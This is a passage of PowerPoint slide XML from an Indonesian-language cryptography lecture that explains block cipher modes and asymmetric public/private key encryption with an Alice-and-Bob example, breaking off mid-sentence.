              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>ECB (Electronic Codebook), CBC (Cipher block chaining), CTR (Counter Mode), GCM (Galois/Counter Mode)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="0" i="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4068774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Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Asimetris</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ciphertext. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ciphertext. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci-kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedemikian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inginkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merahasiakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempublikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Bob.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ciphertext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Bob.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jika Mallory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
